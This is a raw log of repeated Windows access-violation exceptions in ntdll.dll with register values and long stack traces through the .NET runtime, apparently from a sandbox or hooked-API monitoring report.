exception.symbol: RtlInitUnicodeString+0xec RtlMultiByteToUnicodeN-0x251 ntdll+0x2e2f4
exception.instruction: movzx eax, word ptr [esi]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 189172
exception.address: 0x76f3e2f4
registers.esp: 8686988
registers.edi: 63
registers.eax: 83308560
registers.ebp: 8687120
registers.edx: 9074608
registers.ebx: 38
registers.esi: 83308568
registers.ecx: 82754216
1 0 0

__exception__

 stacktrace: 
RtlAllocateHeap+0xac RtlFreeAnsiString-0x54 ntdll+0x2e0d2 @ 0x76f3e0d2
DllGetClassObjectInternal+0x3995f CorDllMainForThunk-0x52b9c clr+0xfe9d8 @ 0x7258e9d8
DllGetClassObjectInternal+0x3cb36 CorDllMainForThunk-0x4f9c5 clr+0x101baf @ 0x72591baf
DllGetClassObjectInternal+0x3ee62 CorDllMainForThunk-0x4d699 clr+0x103edb @ 0x72593edb
DllGetClassObjectInternal+0x3f1f8 CorDllMainForThunk-0x4d303 clr+0x104271 @ 0x72594271
DllGetClassObjectInternal+0x3ef28 CorDllMainForThunk-0x4d5d3 clr+0x103fa1 @ 0x72593fa1
DllGetClassObjectInternal+0x3f9cd CorDllMainForThunk-0x4cb2e clr+0x104a46 @ 0x72594a46
DllGetClassObjectInternal+0x3ca51 CorDllMainForThunk-0x4faaa clr+0x101aca @ 0x72591aca
DllGetClassObjectInternal+0x3e19b CorDllMainForThunk-0x4e360 clr+0x103214 @ 0x72593214
DllGetClassObjectInternal+0x3e4b7 CorDllMainForThunk-0x4e044 clr+0x103530 @ 0x72593530
DllGetClassObjectInternal+0x3e3ed CorDllMainForThunk-0x4e10e clr+0x103466 @ 0x72593466
DllGetClassObjectInternal+0x3ce60 CorDllMainForThunk-0x4f69b clr+0x101ed9 @ 0x72591ed9
DllGetClassObjectInternal+0x3cf04 CorDllMainForThunk-0x4f5f7 clr+0x101f7d @ 0x72591f7d
DllGetClassObjectInternal+0x3cf99 CorDllMainForThunk-0x4f562 clr+0x102012 @ 0x72592012
DllGetClassObjectInternal+0x34d3c CorDllMainForThunk-0x577bf clr+0xf9db5 @ 0x72589db5
DllGetClassObjectInternal+0x34f7f CorDllMainForThunk-0x5757c clr+0xf9ff8 @ 0x72589ff8
DllGetClassObjectInternal+0x34dce CorDllMainForThunk-0x5772d clr+0xf9e47 @ 0x72589e47
DllGetClassObjectInternal+0x34d99 CorDllMainForThunk-0x57762 clr+0xf9e12 @ 0x72589e12
DllGetClassObjectInternal+0x34707 CorDllMainForThunk-0x57df4 clr+0xf9780 @ 0x72589780
CreateAssemblyNameObject+0x2728d GetMetaDataInternalInterface-0x111e2 clr+0x54726 @ 0x724e4726
CreateAssemblyNameObject+0x2730f GetMetaDataInternalInterface-0x11160 clr+0x547a8 @ 0x724e47a8
DllGetClassObjectInternal+0x35622 CorDllMainForThunk-0x56ed9 clr+0xfa69b @ 0x7258a69b
PreBindAssemblyEx+0xe96a StrongNameSignatureVerification-0x35e1 clr+0x1864d5 @ 0x726164d5
mscorlib+0x2d5f5f @ 0x716c5f5f
mscorlib+0x2d5c33 @ 0x716c5c33
mscorlib+0x2d7894 @ 0x716c7894
mscorlib+0x2d74ff @ 0x716c74ff
mscorlib+0x2d71c3 @ 0x716c71c3
mscorlib+0x2d6c3c @ 0x716c6c3c
mscorlib+0x2fcfb1 @ 0x716ecfb1
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0x79c6 CoUninitializeEE-0x5a72 clr+0x19dd2 @ 0x724a9dd2
DllGetClassObjectInternal+0x38b0b CorDllMainForThunk-0x539f0 clr+0xfdb84 @ 0x7258db84
DllGetClassObjectInternal+0x38c16 CorDllMainForThunk-0x538e5 clr+0xfdc8f @ 0x7258dc8f
mscorlib+0x2fce7e @ 0x716ece7e
mscorlib+0x2fcd8c @ 0x716ecd8c
mscorlib+0x2fcd0b @ 0x716ecd0b
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724a2e95
DllGetClassObjectInternal+0x6069a CorDllMainForThunk-0x2be61 clr+0x125713 @ 0x725b5713
DllGetClassObjectInternal+0x6075c CorDllMainForThunk-0x2bd9f clr+0x1257d5 @ 0x725b57d5
mscorlib+0x9bc1c8 @ 0x71dac1c8
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x724b9df8
CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x724b9e2f
DllGetClassObjectInternal+0xc874 CorDllMainForThunk-0x7fc87 clr+0xd18ed @ 0x725618ed
DllGetClassObjectInternal+0xcb84 CorDllMainForThunk-0x7f977 clr+0xd1bfd @ 0x72561bfd
CreateHistoryReader+0x13d0e PostErrorVA-0x155251 clr+0x223553 @ 0x726b3553
LookupHistoryAssembly+0x1550 CoEEShutDownCOM-0x2c2c clr+0x1d8a42 @ 0x72668a42
DllGetClassObjectInternal+0x5fe1c CorDllMainForThunk-0x2c6df clr+0x124e95 @ 0x725b4e95
DllGetClassObjectInternal+0x5fd5f CorDllMainForThunk-0x2c79c clr+0x124dd8 @ 0x725b4dd8
RtlDosSearchPath_Ustr+0xada RtlCaptureContext-0x72 ntdll+0x46ab9 @ 0x76f56ab9
RtlDosSearchPath_Ustr+0xaac RtlCaptureContext-0xa0 ntdll+0x46a8b @ 0x76f56a8b
New_ntdll_RtlDispatchException@8+0xf6 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x23 @ 0x733d482b
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143
RtlFreeHeap+0x7e RtlAllocateHeap-0x23 ntdll+0x2e003 @ 0x76f3e003
RtlFreeSid+0x1b RtlAllocateAndInitializeSid-0x15 ntdll+0x393cd @ 0x76f493cd
GetComputerNameA+0xa84 GetFileInformationByHandleEx-0x62b kernel32+0x2c164 @ 0x755dc164
GetComputerNameA+0xaef GetFileInformationByHandleEx-0x5c0 kernel32+0x2c1cf @ 0x755dc1cf
GetComputerNameA+0xab1 GetFileInformationByHandleEx-0x5fe kernel32+0x2c191 @ 0x755dc191
MapViewOfFileEx+0x21 InitializeCriticalSectionEx-0x84 kernel32+0x14ca4 @ 0x755c4ca4

exception.instruction_r: 0f b7 06 99 0f a4 c2 10 c1 e0 10 0b d8 0b fa 89
exception.symbol: LdrUnlockLoaderLock+0x2cc RtlInitUnicodeStringEx-0xe6b ntdll+0x36f08
exception.instruction: movzx eax, word ptr [esi]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 225032
exception.address: 0x76f46f08
registers.esp: 8686988
registers.edi: 38
registers.eax: 83308560
registers.ebp: 8687120
registers.edx: 4294901824
registers.ebx: 63
registers.esi: 83308568
registers.ecx: 82754216
1 0 0

__exception__

 stacktrace: 
RtlFreeHeap+0x7e RtlAllocateHeap-0x23 ntdll+0x2e003 @ 0x76f3e003
HeapFree+0x14 GetProcessHeap-0xc kernel32+0x114dd @ 0x755c14dd
DllUnregisterServerInternal-0x7f84 clr+0x2170 @ 0x72492170
DllUnregisterServerInternal-0x7f5f clr+0x2195 @ 0x72492195
DllUnregisterServerInternal-0x7f4e clr+0x21a6 @ 0x724921a6
CoUninitializeEE+0xd8a2 CreateAssemblyNameObject-0x3b3 clr+0x2d0e6 @ 0x724bd0e6
DllGetClassObjectInternal+0x3563c CorDllMainForThunk-0x56ebf clr+0xfa6b5 @ 0x7258a6b5
PreBindAssemblyEx+0xe96a StrongNameSignatureVerification-0x35e1 clr+0x1864d5 @ 0x726164d5
mscorlib+0x2d5f5f @ 0x716c5f5f
mscorlib+0x2d5c33 @ 0x716c5c33
mscorlib+0x2d7894 @ 0x716c7894
mscorlib+0x2d74ff @ 0x716c74ff
mscorlib+0x2d71c3 @ 0x716c71c3
mscorlib+0x2d6c3c @ 0x716c6c3c
mscorlib+0x2fcfb1 @ 0x716ecfb1
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0x79c6 CoUninitializeEE-0x5a72 clr+0x19dd2 @ 0x724a9dd2
DllGetClassObjectInternal+0x38b0b CorDllMainForThunk-0x539f0 clr+0xfdb84 @ 0x7258db84
DllGetClassObjectInternal+0x38c16 CorDllMainForThunk-0x538e5 clr+0xfdc8f @ 0x7258dc8f
mscorlib+0x2fce7e @ 0x716ece7e
mscorlib+0x2fcd8c @ 0x716ecd8c
mscorlib+0x2fcd0b @ 0x716ecd0b
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724a2e95
DllGetClassObjectInternal+0x6069a CorDllMainForThunk-0x2be61 clr+0x125713 @ 0x725b5713
DllGetClassObjectInternal+0x6075c CorDllMainForThunk-0x2bd9f clr+0x1257d5 @ 0x725b57d5
mscorlib+0x9bc1c8 @ 0x71dac1c8
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x724b9df8
CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x724b9e2f
DllGetClassObjectInternal+0xc874 CorDllMainForThunk-0x7fc87 clr+0xd18ed @ 0x725618ed
DllGetClassObjectInternal+0xcb84 CorDllMainForThunk-0x7f977 clr+0xd1bfd @ 0x72561bfd
CreateHistoryReader+0x13d0e PostErrorVA-0x155251 clr+0x223553 @ 0x726b3553
LookupHistoryAssembly+0x1550 CoEEShutDownCOM-0x2c2c clr+0x1d8a42 @ 0x72668a42
DllGetClassObjectInternal+0x5fe1c CorDllMainForThunk-0x2c6df clr+0x124e95 @ 0x725b4e95
DllGetClassObjectInternal+0x5fd5f CorDllMainForThunk-0x2c79c clr+0x124dd8 @ 0x725b4dd8
RtlDosSearchPath_Ustr+0xada RtlCaptureContext-0x72 ntdll+0x46ab9 @ 0x76f56ab9
RtlDosSearchPath_Ustr+0xaac RtlCaptureContext-0xa0 ntdll+0x46a8b @ 0x76f56a8b
New_ntdll_RtlDispatchException@8+0xf6 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x23 @ 0x733d482b
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143
RtlFreeHeap+0x7e RtlAllocateHeap-0x23 ntdll+0x2e003 @ 0x76f3e003
RtlFreeSid+0x1b RtlAllocateAndInitializeSid-0x15 ntdll+0x393cd @ 0x76f493cd
GetComputerNameA+0xa84 GetFileInformationByHandleEx-0x62b kernel32+0x2c164 @ 0x755dc164
GetComputerNameA+0xaef GetFileInformationByHandleEx-0x5c0 kernel32+0x2c1cf @ 0x755dc1cf
GetComputerNameA+0xab1 GetFileInformationByHandleEx-0x5fe kernel32+0x2c191 @ 0x755dc191
MapViewOfFileEx+0x21 InitializeCriticalSectionEx-0x84 kernel32+0x14ca4 @ 0x755c4ca4
RegOpenKeyExW+0xf6 LocalFree-0x935 kernel32+0x12407 @ 0x755c2407
RegOpenKeyExW+0x21 LocalFree-0xa0a kernel32+0x12332 @ 0x755c2332
New_advapi32_RegOpenKeyExW@20+0x4f New_advapi32_RegQueryInfoKeyA@48-0x173 @ 0x733c3ca1
CreateAssemblyNameObject+0xc283 GetMetaDataInternalInterface-0x2c1ec clr+0x3971c @ 0x724c971c
StrongNameSignatureVerification+0x9a32 GetMetaDataPublicInterfaceFromInternal-0x1e1e clr+0x1934e8 @ 0x726234e8
StrongNameSignatureVerification+0x9bcc GetMetaDataPublicInterfaceFromInternal-0x1c84 clr+0x193682 @ 0x72623682
GetMetaDataPublicInterfaceFromInternal+0x641 CopyPDBs-0x2fb clr+0x195947 @ 0x72625947
GetMetaDataPublicInterfaceFromInternal+0x850 CopyPDBs-0xec clr+0x195b56 @ 0x72625b56
GetMetaDataPublicInterfaceFromInternal+0x23d CopyPDBs-0x6ff clr+0x195543 @ 0x72625543
StrongNameSignatureVerification+0x839b GetMetaDataPublicInterfaceFromInternal-0x34b5 clr+0x191e51 @ 0x72621e51
StrongNameSignatureVerification+0x854e GetMetaDataPublicInterfaceFromInternal-0x3302 clr+0x192004 @ 0x72622004
mscorlib+0x355147 @ 0x71745147
mscorlib+0x985c14 @ 0x71d75c14
mscorlib+0x9b45cf @ 0x71da45cf
mscorlib+0xd224c1 @ 0x721124c1

exception.instruction_r: 8b 46 04 89 45 f4 c6 47 07 80 c6 47 06 00 8b 5e
exception.symbol: RtlInitUnicodeString+0x196 RtlMultiByteToUnicodeN-0x1a7 ntdll+0x2e39e
exception.instruction: mov eax, dword ptr [esi + 4]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 189342
exception.address: 0x76f3e39e
registers.esp: 8689204
registers.edi: 82784280
registers.eax: 82754208
registers.ebp: 8689256
registers.edx: 82784288
registers.ebx: 82784288
registers.esi: 1152194588
registers.ecx: 9043968
1 0 0

__exception__

 stacktrace: 
RtlAllocateHeap+0xac RtlFreeAnsiString-0x54 ntdll+0x2e0d2 @ 0x76f3e0d2
DllGetClassObjectInternal+0x3995f CorDllMainForThunk-0x52b9c clr+0xfe9d8 @ 0x7258e9d8
DllGetClassObjectInternal+0x3cb36 CorDllMainForThunk-0x4f9c5 clr+0x101baf @ 0x72591baf
DllGetClassObjectInternal+0x3ee62 CorDllMainForThunk-0x4d699 clr+0x103edb @ 0x72593edb
DllGetClassObjectInternal+0x3f1f8 CorDllMainForThunk-0x4d303 clr+0x104271 @ 0x72594271
DllGetClassObjectInternal+0x3ef28 CorDllMainForThunk-0x4d5d3 clr+0x103fa1 @ 0x72593fa1
DllGetClassObjectInternal+0x3f9cd CorDllMainForThunk-0x4cb2e clr+0x104a46 @ 0x72594a46
DllGetClassObjectInternal+0x3ca51 CorDllMainForThunk-0x4faaa clr+0x101aca @ 0x72591aca
DllGetClassObjectInternal+0x34946 CorDllMainForThunk-0x57bb5 clr+0xf99bf @ 0x725899bf
DllGetClassObjectInternal+0x349d3 CorDllMainForThunk-0x57b28 clr+0xf9a4c @ 0x72589a4c
DllGetClassObjectInternal+0x34a2d CorDllMainForThunk-0x57ace clr+0xf9aa6 @ 0x72589aa6
DllGetClassObjectInternal+0x342b6 CorDllMainForThunk-0x58245 clr+0xf932f @ 0x7258932f
DllGetClassObjectInternal+0x342eb CorDllMainForThunk-0x58210 clr+0xf9364 @ 0x72589364
DllGetClassObjectInternal+0x3463d CorDllMainForThunk-0x57ebe clr+0xf96b6 @ 0x725896b6
CreateAssemblyNameObject+0x2728d GetMetaDataInternalInterface-0x111e2 clr+0x54726 @ 0x724e4726
CreateAssemblyNameObject+0x2730f GetMetaDataInternalInterface-0x11160 clr+0x547a8 @ 0x724e47a8
DllGetClassObjectInternal+0x35622 CorDllMainForThunk-0x56ed9 clr+0xfa69b @ 0x7258a69b
PreBindAssemblyEx+0xe96a StrongNameSignatureVerification-0x35e1 clr+0x1864d5 @ 0x726164d5
mscorlib+0x2d5f5f @ 0x716c5f5f
mscorlib+0x2d5c33 @ 0x716c5c33
mscorlib+0x2d7894 @ 0x716c7894
mscorlib+0x2d74ff @ 0x716c74ff
mscorlib+0x2d71c3 @ 0x716c71c3
mscorlib+0x2d6c3c @ 0x716c6c3c
mscorlib+0x2fcfb1 @ 0x716ecfb1
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0x79c6 CoUninitializeEE-0x5a72 clr+0x19dd2 @ 0x724a9dd2
DllGetClassObjectInternal+0x38b0b CorDllMainForThunk-0x539f0 clr+0xfdb84 @ 0x7258db84
DllGetClassObjectInternal+0x38c16 CorDllMainForThunk-0x538e5 clr+0xfdc8f @ 0x7258dc8f
mscorlib+0x2fce7e @ 0x716ece7e
mscorlib+0x2fcd8c @ 0x716ecd8c
mscorlib+0x2fcd0b @ 0x716ecd0b
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724a2e95
DllGetClassObjectInternal+0x6069a CorDllMainForThunk-0x2be61 clr+0x125713 @ 0x725b5713
DllGetClassObjectInternal+0x6075c CorDllMainForThunk-0x2bd9f clr+0x1257d5 @ 0x725b57d5
mscorlib+0x9bc1c8 @ 0x71dac1c8
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x724b9df8
CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x724b9e2f
DllGetClassObjectInternal+0xc874 CorDllMainForThunk-0x7fc87 clr+0xd18ed @ 0x725618ed
DllGetClassObjectInternal+0xcb84 CorDllMainForThunk-0x7f977 clr+0xd1bfd @ 0x72561bfd
CreateHistoryReader+0x13d0e PostErrorVA-0x155251 clr+0x223553 @ 0x726b3553
LookupHistoryAssembly+0x1550 CoEEShutDownCOM-0x2c2c clr+0x1d8a42 @ 0x72668a42
DllGetClassObjectInternal+0x5fe1c CorDllMainForThunk-0x2c6df clr+0x124e95 @ 0x725b4e95
DllGetClassObjectInternal+0x5fd5f CorDllMainForThunk-0x2c79c clr+0x124dd8 @ 0x725b4dd8
RtlDosSearchPath_Ustr+0xada RtlCaptureContext-0x72 ntdll+0x46ab9 @ 0x76f56ab9
RtlDosSearchPath_Ustr+0xaac RtlCaptureContext-0xa0 ntdll+0x46a8b @ 0x76f56a8b
New_ntdll_RtlDispatchException@8+0xf6 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x23 @ 0x733d482b
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143
RtlFreeHeap+0x7e RtlAllocateHeap-0x23 ntdll+0x2e003 @ 0x76f3e003
HeapFree+0x14 GetProcessHeap-0xc kernel32+0x114dd @ 0x755c14dd
DllUnregisterServerInternal-0x7f84 clr+0x2170 @ 0x72492170
DllUnregisterServerInternal-0x7f5f clr+0x2195 @ 0x72492195
DllUnregisterServerInternal-0x7f4e clr+0x21a6 @ 0x724921a6
CoUninitializeEE+0xd8a2 CreateAssemblyNameObject-0x3b3 clr+0x2d0e6 @ 0x724bd0e6
DllGetClassObjectInternal+0x3563c CorDllMainForThunk-0x56ebf clr+0xfa6b5 @ 0x7258a6b5
PreBindAssemblyEx+0xe96a StrongNameSignatureVerification-0x35e1 clr+0x1864d5 @ 0x726164d5
mscorlib+0x2d5f5f @ 0x716c5f5f
mscorlib+0x2d5c33 @ 0x716c5c33
mscorlib+0x2d7894 @ 0x716c7894

exception.instruction_r: 0f b7 06 99 0f a4 c2 10 c1 e0 10 0b f8 0b da 89
exception.symbol: RtlInitUnicodeString+0xec RtlMultiByteToUnicodeN-0x251 ntdll+0x2e2f4
exception.instruction: movzx eax, word ptr [esi]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 189172
exception.address: 0x76f3e2f4
registers.esp: 8681932
registers.edi: 63
registers.eax: 83308560
registers.ebp: 8682064
registers.edx: 9074608
registers.ebx: 44
registers.esi: 83308568
registers.ecx: 82754216
1 0 0

__exception__

 stacktrace: 
RtlAllocateHeap+0xac RtlFreeAnsiString-0x54 ntdll+0x2e0d2 @ 0x76f3e0d2
DllGetClassObjectInternal+0x3995f CorDllMainForThunk-0x52b9c clr+0xfe9d8 @ 0x7258e9d8
DllGetClassObjectInternal+0x3cb36 CorDllMainForThunk-0x4f9c5 clr+0x101baf @ 0x72591baf
DllGetClassObjectInternal+0x3ee62 CorDllMainForThunk-0x4d699 clr+0x103edb @ 0x72593edb
DllGetClassObjectInternal+0x3f1f8 CorDllMainForThunk-0x4d303 clr+0x104271 @ 0x72594271
DllGetClassObjectInternal+0x3ef28 CorDllMainForThunk-0x4d5d3 clr+0x103fa1 @ 0x72593fa1
DllGetClassObjectInternal+0x3f9cd CorDllMainForThunk-0x4cb2e clr+0x104a46 @ 0x72594a46
DllGetClassObjectInternal+0x3ca51 CorDllMainForThunk-0x4faaa clr+0x101aca @ 0x72591aca
DllGetClassObjectInternal+0x34946 CorDllMainForThunk-0x57bb5 clr+0xf99bf @ 0x725899bf
DllGetClassObjectInternal+0x349d3 CorDllMainForThunk-0x57b28 clr+0xf9a4c @ 0x72589a4c
DllGetClassObjectInternal+0x34a2d CorDllMainForThunk-0x57ace clr+0xf9aa6 @ 0x72589aa6
DllGetClassObjectInternal+0x342b6 CorDllMainForThunk-0x58245 clr+0xf932f @ 0x7258932f
DllGetClassObjectInternal+0x342eb CorDllMainForThunk-0x58210 clr+0xf9364 @ 0x72589364
DllGetClassObjectInternal+0x3463d CorDllMainForThunk-0x57ebe clr+0xf96b6 @ 0x725896b6
CreateAssemblyNameObject+0x2728d GetMetaDataInternalInterface-0x111e2 clr+0x54726 @ 0x724e4726
CreateAssemblyNameObject+0x2730f GetMetaDataInternalInterface-0x11160 clr+0x547a8 @ 0x724e47a8
DllGetClassObjectInternal+0x35622 CorDllMainForThunk-0x56ed9 clr+0xfa69b @ 0x7258a69b
PreBindAssemblyEx+0xe96a StrongNameSignatureVerification-0x35e1 clr+0x1864d5 @ 0x726164d5
mscorlib+0x2d5f5f @ 0x716c5f5f
mscorlib+0x2d5c33 @ 0x716c5c33
mscorlib+0x2d7894 @ 0x716c7894
mscorlib+0x2d74ff @ 0x716c74ff
mscorlib+0x2d71c3 @ 0x716c71c3
mscorlib+0x2d6c3c @ 0x716c6c3c
mscorlib+0x2fcfb1 @ 0x716ecfb1
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0x79c6 CoUninitializeEE-0x5a72 clr+0x19dd2 @ 0x724a9dd2
DllGetClassObjectInternal+0x38b0b CorDllMainForThunk-0x539f0 clr+0xfdb84 @ 0x7258db84
DllGetClassObjectInternal+0x38c16 CorDllMainForThunk-0x538e5 clr+0xfdc8f @ 0x7258dc8f
mscorlib+0x2fce7e @ 0x716ece7e
mscorlib+0x2fcd8c @ 0x716ecd8c
mscorlib+0x2fcd0b @ 0x716ecd0b
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724a2e95
DllGetClassObjectInternal+0x6069a CorDllMainForThunk-0x2be61 clr+0x125713 @ 0x725b5713
DllGetClassObjectInternal+0x6075c CorDllMainForThunk-0x2bd9f clr+0x1257d5 @ 0x725b57d5
mscorlib+0x9bc1c8 @ 0x71dac1c8
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x724b9df8
CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x724b9e2f
DllGetClassObjectInternal+0xc874 CorDllMainForThunk-0x7fc87 clr+0xd18ed @ 0x725618ed
DllGetClassObjectInternal+0xcb84 CorDllMainForThunk-0x7f977 clr+0xd1bfd @ 0x72561bfd
CreateHistoryReader+0x13d0e PostErrorVA-0x155251 clr+0x223553 @ 0x726b3553
LookupHistoryAssembly+0x1550 CoEEShutDownCOM-0x2c2c clr+0x1d8a42 @ 0x72668a42
DllGetClassObjectInternal+0x5fe1c CorDllMainForThunk-0x2c6df clr+0x124e95 @ 0x725b4e95
DllGetClassObjectInternal+0x5fd5f CorDllMainForThunk-0x2c79c clr+0x124dd8 @ 0x725b4dd8
RtlDosSearchPath_Ustr+0xada RtlCaptureContext-0x72 ntdll+0x46ab9 @ 0x76f56ab9
RtlDosSearchPath_Ustr+0xaac RtlCaptureContext-0xa0 ntdll+0x46a8b @ 0x76f56a8b
New_ntdll_RtlDispatchException@8+0xf6 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x23 @ 0x733d482b
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143
RtlFreeHeap+0x7e RtlAllocateHeap-0x23 ntdll+0x2e003 @ 0x76f3e003
HeapFree+0x14 GetProcessHeap-0xc kernel32+0x114dd @ 0x755c14dd
DllUnregisterServerInternal-0x7f84 clr+0x2170 @ 0x72492170
DllUnregisterServerInternal-0x7f5f clr+0x2195 @ 0x72492195
DllUnregisterServerInternal-0x7f4e clr+0x21a6 @ 0x724921a6
CoUninitializeEE+0xd8a2 CreateAssemblyNameObject-0x3b3 clr+0x2d0e6 @ 0x724bd0e6
DllGetClassObjectInternal+0x3563c CorDllMainForThunk-0x56ebf clr+0xfa6b5 @ 0x7258a6b5
PreBindAssemblyEx+0xe96a StrongNameSignatureVerification-0x35e1 clr+0x1864d5 @ 0x726164d5
mscorlib+0x2d5f5f @ 0x716c5f5f
mscorlib+0x2d5c33 @ 0x716c5c33
mscorlib+0x2d7894 @ 0x716c7894

exception.instruction_r: 0f b7 06 99 0f a4 c2 10 c1 e0 10 0b d8 0b fa 89
exception.symbol: LdrUnlockLoaderLock+0x2cc RtlInitUnicodeStringEx-0xe6b ntdll+0x36f08
exception.instruction: movzx eax, word ptr [esi]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 225032
exception.address: 0x76f46f08
registers.esp: 8681932
registers.edi: 44
registers.eax: 83308560
registers.ebp: 8682064
registers.edx: 4294901824
registers.ebx: 63
registers.esi: 83308568
registers.ecx: 82754216
1 0 0

__exception__

 stacktrace: 
RtlAllocateHeap+0xac RtlFreeAnsiString-0x54 ntdll+0x2e0d2 @ 0x76f3e0d2
DllGetClassObjectInternal+0x3995f CorDllMainForThunk-0x52b9c clr+0xfe9d8 @ 0x7258e9d8
DllGetClassObjectInternal+0x3cb36 CorDllMainForThunk-0x4f9c5 clr+0x101baf @ 0x72591baf
DllGetClassObjectInternal+0x3cb02 CorDllMainForThunk-0x4f9f9 clr+0x101b7b @ 0x72591b7b
DllGetClassObjectInternal+0x3d036 CorDllMainForThunk-0x4f4c5 clr+0x1020af @ 0x725920af
DllGetClassObjectInternal+0x3d08d CorDllMainForThunk-0x4f46e clr+0x102106 @ 0x72592106
DllGetClassObjectInternal+0x3c8ff CorDllMainForThunk-0x4fbfc clr+0x101978 @ 0x72591978
DllGetClassObjectInternal+0x3c9d8 CorDllMainForThunk-0x4fb23 clr+0x101a51 @ 0x72591a51
DllGetClassObjectInternal+0x3e19b CorDllMainForThunk-0x4e360 clr+0x103214 @ 0x72593214
DllGetClassObjectInternal+0x3e4b7 CorDllMainForThunk-0x4e044 clr+0x103530 @ 0x72593530
DllGetClassObjectInternal+0x3e3ed CorDllMainForThunk-0x4e10e clr+0x103466 @ 0x72593466
DllGetClassObjectInternal+0x3ce60 CorDllMainForThunk-0x4f69b clr+0x101ed9 @ 0x72591ed9
DllGetClassObjectInternal+0x3cf04 CorDllMainForThunk-0x4f5f7 clr+0x101f7d @ 0x72591f7d
DllGetClassObjectInternal+0x3cf99 CorDllMainForThunk-0x4f562 clr+0x102012 @ 0x72592012
DllGetClassObjectInternal+0x34d3c CorDllMainForThunk-0x577bf clr+0xf9db5 @ 0x72589db5
DllGetClassObjectInternal+0x34f7f CorDllMainForThunk-0x5757c clr+0xf9ff8 @ 0x72589ff8
DllGetClassObjectInternal+0x34dce CorDllMainForThunk-0x5772d clr+0xf9e47 @ 0x72589e47
DllGetClassObjectInternal+0x34d99 CorDllMainForThunk-0x57762 clr+0xf9e12 @ 0x72589e12
DllGetClassObjectInternal+0x34707 CorDllMainForThunk-0x57df4 clr+0xf9780 @ 0x72589780
CreateAssemblyNameObject+0x2728d GetMetaDataInternalInterface-0x111e2 clr+0x54726 @ 0x724e4726
CreateAssemblyNameObject+0x2730f GetMetaDataInternalInterface-0x11160 clr+0x547a8 @ 0x724e47a8
DllGetClassObjectInternal+0x35622 CorDllMainForThunk-0x56ed9 clr+0xfa69b @ 0x7258a69b
PreBindAssemblyEx+0xe96a StrongNameSignatureVerification-0x35e1 clr+0x1864d5 @ 0x726164d5
mscorlib+0x2d5f5f @ 0x716c5f5f
mscorlib+0x2d5c33 @ 0x716c5c33
mscorlib+0x2d7894 @ 0x716c7894
mscorlib+0x2d74ff @ 0x716c74ff
mscorlib+0x2d71c3 @ 0x716c71c3
mscorlib+0x2d6c3c @ 0x716c6c3c
